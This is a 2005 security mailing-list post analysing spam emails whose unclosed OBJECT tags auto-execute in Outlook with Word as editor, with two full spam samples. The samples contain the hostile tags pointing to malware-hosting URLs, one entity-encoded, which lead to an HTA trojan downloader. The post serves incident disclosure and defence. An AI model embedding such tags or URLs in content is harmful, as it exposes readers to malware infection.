[Intrusions] Hostile object tags in spam

James C Slora Jr Jim.Slora at phra.com
Wed Jan 12 23:37:45 GMT 2005 

Hostile object tags in spam are making an appearance again. We had a break
for a few months.

There is no closing </OBJECT>, so they will auto-execute when forwarded by
people using Word as their Outlook editor. This happens without warning, and
regardless of service pack level or zone settings. I have not found any AV
to trigger on this exploit (not that I expect them to alert on an unclosed
tag).
http://secunia.com/advisories/12041/

=============
TYPE 1 (live)
=============
One batch used OBJECT data in a Multi-part message. Object tag appears in
both the plain text section and the HTML section.

Hostile site:
http://www.alobhyundajacoupe.com/scr/page.php
That hostile page is currently live. It returns page.hta, which gets
detected as a generic Download.Trojan by Symantec. It is an HTA exploit in
encoded VBScript, a variation of the Zerolin (aka Inor, etc) trojan
downloader. Once decoded, Symantec fails to detect the script as Zerolin,
but everyone else on Virustotal detects it as Zerolin. The HTA page writes
c:\x.exe to the hard disk from embedded Hex code and executes it to download
key.exe, detected by Symantec as Backdoor.Daemonize, documented as a proxy
trojan.

I have files if anyone is interested, but nothing looks new except that
VBScript.Encoded Zerolin is on a web page instead of in the actual spammed
message.

=============
TYPE 2 (dead) - Example
=============
Another batch used OBJECT embed rather than OBJECT data and encoded the URL.
Hostile site:
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#111;&#
115;&#116;&#105;&#110;&#103;&#97;&#110;&#105;&#109;&#101;&#46;&#99;&#111;&#1
09;&#47;&#107;&#98;&#97;&#114;&#47;

Which decodes to:
http://www.hostinganime.com/kbar

That page was dead to me when I checked - hostinganime must have taken care
of it already.



=============
TYPE 1 (live)- Example
=============
Subject: Hello George
Received: from dialup1-213.134.2.202.keystone.hu
(dialup1-213.134.2.202.keystone.hu [213.134.2.202])
Message-ID: <55684281984472.21302.qmail at web41296.mail.yahoo.com>
Received: from [213.134.2.202] by web41296.mail.yahoo.com via HTTP; Wed, 12
Jan 2005 12:57:33 -0600
Date: Wed, 12 Jan 2005 12:57:33 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="0-4555602865-4593356873=:15474"

--0-4555602865-4593356873=:15474
Content-Type: text/plain; charset=us-ascii

object data="http://www.alobhyundajacoupe.com/scr/page.php">Hi George,<br>
Great work with the photo. I agree with you, I've been trying out new
photoshop techniques since I joined a month ago... It's very addictive and I
have so much more to learn!
<br>Regards,<br>
Allen Eaton
--0-4555602865-4593356873=:15474
Content-Type: text/html; charset=us-ascii

object data="http://www.alobhyundajacoupe.com/scr/page.php">Hi George,<br>
Great work with the photo. I agree with you, I've been trying out new
photoshop techniques since I joined a month ago... It's very addictive and I
have so much more to learn!
<br>Regards,<br>
Allen Eaton
--0-4555602865-4593356873=:15474--

=============
TYPE 2 (dead) - Example
=============
Subject: M1crOsOft Update Alert
Received: from 200216007183.user.veloxzone.com.br
(200216007183.user.veloxzone.com.br [200.216.7.183])
Received: from polariton.dx.net ([64.75.1.104])
          by affectation.freeaccess.nl
          (InterMail vK.4.04.00.03 172-937-413-20031559 license
2yi625wd9554v9ac4z4kqi5221p6neb9)
          with SMTP
          id <20046162601581.BZZI2351.affectation at polariton.dx.net>
          for <sharp at phra.com>; Wed, 12 Jan 2005 04:32:14 +0500
Received: from www.dx.net (66.150.161.133)
	by polariton.dx.net (RS ver 1.0.92vs) with SMTP id 3-26c040750670
	for <sharp at phra.com>; Wed, 12 Jan 2005 01:27:14 +0200 (EDT)
Date: Tue, 11 Jan 2005 22:32:14 -0100
Message-ID: <866773436577.ELQ32819 at recession.freeaccess.nl>
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7Bit

Stop paying full pr!ce for your software

W!ndows X.P Pr0fessional + Office X*P PrOfessional for as low as 8o$

get it quickly:  http://armageddon.win-xp-oem.biz/

The offer is valid till january  22th
stock is limited





please reply

Royal Benoit
Miller
world of health biotech co.,ltd, 10035, China
Phone: 171-164-9811
Mobile: 213-419-1411
Email: rsqlg at dragoncon.net

This is a confirmation message

This download is a 70 hour complementary shareware

NOTES:
The contents of this reply is for your exclusive use and should not be
periodic bimodal

stayed stonewort glycerine

Time: Tue, 11 Jan 2005 18:34:14 -0500
object embed="
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#111;&#
115;&#116;&#105;&#110;&#103;&#97;&#110;&#105;&#109;&#101;&#46;&#99;&#111;&#1
09;&#47;&#107;&#98;&#97;&#114;&#47;">

More information about the Intrusions mailing list